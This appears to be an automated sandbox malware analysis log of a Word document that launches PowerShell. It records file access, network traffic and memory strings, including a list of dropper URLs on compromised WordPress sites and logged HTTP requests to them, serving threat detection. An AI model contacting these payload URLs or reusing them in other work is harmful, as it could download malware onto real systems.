Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: global trafficDNS query: name: wheelcomoving.com
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 58.97.195.135:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.85.46.76:80

Networking:

barindex
Potential dropper URLs found in powershell memoryShow sources
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmpString found in memory: http://wheelcomoving.com/p/RuMeRPa/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmpString found in memory: http://00zyku.com/wp-admin/eYu1Q/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmpString found in memory: http://ketoresetme.com/wp-content/pmJ/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmpString found in memory: https://rycomputer.com/content/TL/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmpString found in memory: https://d-cem.com/wp-admin/JSLwG1/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmpString found in memory: http://thebestfikrah.com/wp-admin/fOIlVX/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmpString found in memory: https://phawayagency.com/wp-admin/mXo4b/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></ QUICK AND EASY LOW CARB">The Ketonian Cookbook &#8211; QUICK AND EASY LOW C
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/" rel="bookmark" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/" rel="bookmark" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-eating-daniela-diaries/" rel="bookmark" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/beyond-keto-virtual-summit-the-mid-life-re-life-blueprint-programme-free-all-access-pass/" rel="bookmark" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/keto-full-day-of-eating-keto-bakes-biscuits-keto-chow/" rel="bookmark" title="Keto Full Day of Eating | Keto Bakes Biscuits | Keto Chow"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Full-Day-of-Eating-Keto-Bakes-Biscuits-Keto-Chow-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Full-Day-of-Eating-Keto-Bakes-Biscuits-Keto-Chow-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Full-Day-of-Eating-Keto-Bakes-Biscuits-Keto-Chow-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Keto Full Day of Eating | Keto Bakes Biscuits | Keto Chow"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/the-ketonian-cookbook-quick-and-easy-low-carb/" rel="bookmark" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></span></a></div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: <script type="application/ld+json" class="yoast-schema-graph">{"
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: context":"https://schema.org","
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: graph":[{"
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: type":"WebSite","
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: id":"https://stage.thebestfikrah.com/#website","url":"https://stage.thebestfikrah.com/","name":"The Best Fikrah","description":"Think Right. Lead Well.","potentialAction":[{"
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: type":"SearchAction","target":"https://stage.thebestfikrah.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}</script>
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: type":"SearchAction","target":"https://stage.thebestfikrah.com/?s={search_term_string}","query-input":"required name=search_term_st
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: <img width="6413" height="914" alt="" loading="lazy" data-srcset="https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png 6413w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-300x43.png 300w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1024x146.png 1024w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-770x110.png 770w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1536x219.png 1536w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-2048x292.png 2048w" data-src="https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png" data-sizes="(max-width: 6413px) 100vw, 6413px" class="attachment-full size-full lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img width="6413" height="914" src="https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png" class="attachment-full size-full" alt="" loading="lazy" srcset="https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png 6413w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-300x43.png 300w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1024x146.png 1024w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-770x110.png 770w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1536x219.png 1536w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-2048x292.png 2048w" sizes="(max-width: 6413px) 100vw, 6413px" /></noscript></div>
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: <div class="elementor-text-editor elementor-clearfix"><p><a href="https://thebestfikrah.com/about-us/">About us</a><br /><a href="https://thebestfikrah.com/foreword-founder/">Founder says</a><br /><a href="https://thebestfikrah.com/our-team/">Our team</a><br /><a href="https://thebestfikrah.com/terms-and-conditions/">Terms and conditions</a><br /><a href="https://thebestfikrah.com/privacy-policy/">Privacy Policy</a></p></div>
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in memory: <div class="elementor-text-editor elementor-clearfix"><p><a href="https://www.facebook.com/groups/thebestfikrah">Join us</a><br /><a href="https://thebestfikrah.com/contribute-your-writing/">Contribute</a><br /><a href="https://thebestfikrah.com/contact-us/">Contact us</a><br /><a href="https://thebestfikrah.com/sitemap_index.xml">Site Map</a></p></div>
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div>
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in memory: <li id="menu-item-1598" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-1598"><a title="" href="https://wheelcomoving.com/">Home</a></li><li id="menu-item-2113" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2113"><a href="https://wheelcomoving.com/track-and-trace/">TRACK AND TRACE</a></li><li id="menu-item-1158" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1158"><a title="" href="https://wheelcomoving.com/company/">About us</a></li><li id="menu-item-1138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1138"><a title="" href="https://wheelcomoving.com/company/contact/">Contact</a></li><li id="menu-item-1406" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1406"><a title="" href="https://wheelcomoving.com/services/">Our Services</a><ul class="sub-menu"><li id="menu-item-1143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1143"><a title="" href="https://wheelcomoving.com/services/trucking/">Trucking</a></li><li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141"><a title="" href="https://wheelcomoving.com/services/air-cargo/">Air Cargo</a></li><li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140"><a title="" href="https://wheelcomoving.com/services/ocean-cargo/">Ocean Cargo</a></li><li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142"><a title="" href="https://wheelcomoving.com/services/courier/">Courier</a></li></ul></li>
Source: global trafficHTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1Host: wheelcomoving.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-admin/fOIlVX/ HTTP/1.1Host: thebestfikrah.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 66.85.46.76 66.85.46.76
Source: Joe Sandbox ViewIP Address: 70.32.23.58 70.32.23.58
Source: Joe Sandbox ViewASN Name: HOST4GEEKS-LLCUS HOST4GEEKS-LLCUS
Source: Joe Sandbox ViewASN Name: SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY
Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4ABB8037-B28F-4AE5-86AD-026C320EA73C}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1Host: wheelcomoving.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-admin/fOIlVX/ HTTP/1.1Host: thebestfikrah.comConnection: Keep-Alive
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.twitter.com (Twitter)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: <div class="elementor-text-editor elementor-clearfix"><p><a href="https://www.facebook.com/groups/thebestfikrah">Join us</a><br /><a href="https://thebestfikrah.com/contribute-your-writing/">Contribute</a><br /><a href="https://thebestfikrah.com/contact-us/">Contact us</a><br /><a href="https://thebestfikrah.com/sitemap_index.xml">Site Map</a></p></div> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: <a class="elementor-icon" href="https://www.facebook.com/thebestfikrah/"> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: <a class="elementor-icon" href="https://www.youtube.com/channel/UCxY0oXl0BiKqF7iS16gHFhg"> equals www.youtube.com (Youtube)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.facebook.com/groups/thebestfikrah" class="elementor-button-link elementor-button elementor-size-xs elementor-animation-grow" role="button"> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-103112"><a href="https://www.facebook.com/groups/thebestfikrah" class="elementor-item">Join us</a></li> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=218352666062597&ev=PageView&noscript=1" /> equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: wheelcomoving.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Jan 2021 10:47:06 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wheelcomoving.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, Keep-AliveVary: Accept-EncodingKeep-Alive: timeout=5, max=100Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 0d 0a Data Ascii: 17<!DOCTYPE html><html
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://00zyku.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmpString found in binary or memory: http://00zyku.com/wp-admin/eYu1Q/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://192.168.0.194/wp_011_lifestyle/wp-content/uploads/2017/03/2.jpg
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:100
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Work
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://html5shim.googlecode.com/svn/trunk/html5.js
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.5.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.5
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.5.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/pmJ/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/includes/demos/lifestyle/demo_style.css?ver=8.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style-woocommerce.css?ver=8.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style.css?ver=8.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/xmlrpc.php
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.comx
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000005.00000002.2218306203.0000000002330000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-admin/fOIlVX/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/css/layerslider.cs
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.kre
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.tra
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.uti
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/acurax-social-media-widget/css/style.css?v=3.2.10&#038;v
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/awsm-team/css/team.min.css?ver=1.2.1
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/awsm-team/js/team.min.js?ver=1.2.1
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/easy-accordion-free/public/assets/css/ea-style.css?ver=2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/easy-accordion-free/public/assets/css/font-awesome.min.c
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.0.9
